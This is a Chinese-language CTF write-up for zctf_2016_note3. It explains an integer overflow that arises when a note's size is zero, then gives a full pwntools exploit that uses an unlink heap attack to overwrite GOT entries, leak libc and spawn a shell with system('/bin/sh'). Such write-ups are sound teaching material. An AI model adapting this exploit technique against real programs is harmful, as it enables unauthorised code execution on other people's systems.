zctf_2016_note3
查看保护
这里假如size为0的时候,会有一个非常大的溢出(整型溢出)。因为i是unsigned类型,而a2是int类型,比较的时候会溢出。0 - 1 > i
攻击思路:创建一个size为0的堆块时,在edit的时候就可以将下面的堆块进行覆盖。这里笔者采用的是unlink攻击。具体的攻击方法见z1r0’s blog。通过unlink劫持got表。将free_got改为puts_plt这个时候可以泄露libc。再将atoi_got改为system,再传入/bin/sh\x00,即可getshell。
from pwn import *
context(arch='amd64', os='linux', log_level='debug')
file_name = './z1r0'
debug = 0
if debug:
r = remote()
else:
r = process(file_name)
elf = ELF(file_name)
def dbg():
gdb.attach(r)
menu = 'option--->>'
def add(size, content):
r.sendlineafter(menu, '1')
r.sendlineafter('Input the length of the note content:(less than 1024)', str(size))
r.sendlineafter('Input the note content:', content)
def edit(index, content):
r.sendlineafter(menu, '3')
r.sendlineafter('Input the id of the note:', str(index))
r.sendlineafter('Input the new content:', content)
def delete(index):
r.sendlineafter(menu, '4')
r.sendlineafter('Input the id of the note:', str(index))
ptr = 0x6020C8
fd = ptr - 0x18
bk = ptr - 0x10
p1 = p64(0) + p64(0xb1) + p64(fd) + p64(bk)
add(0x90, p1)
add(0,'bbbb') #1
add(0x90,'cccc') #2
add(0x10, 'dddd')
delete(1)
p2 = p64(0) * 2 + p64(0xb0) + p64(0xa0)
add(0, p2)
delete(2)
p3 = p64(0) * 2 + p64(elf.got['free']) * 2 + p64(elf.got['atoi']) + p64(0) + p64(elf.got['atoi'])
edit(0, p3)
edit(0, p64(elf.plt['puts'])[:-1])
delete(1)
atoi_addr = u64(r.recvuntil('\x7f')[-6:].ljust(8, b'\x00'))
success('atoi_addr = ' + hex(atoi_addr))
libc = ELF('./2.23/libc-2.23.so')
libc_base = atoi_addr - libc.sym['atoi']
system_addr = libc_base + libc.sym['system']
edit(3, p64(system_addr))
r.sendline('/bin/sh\x00')
r.interactive()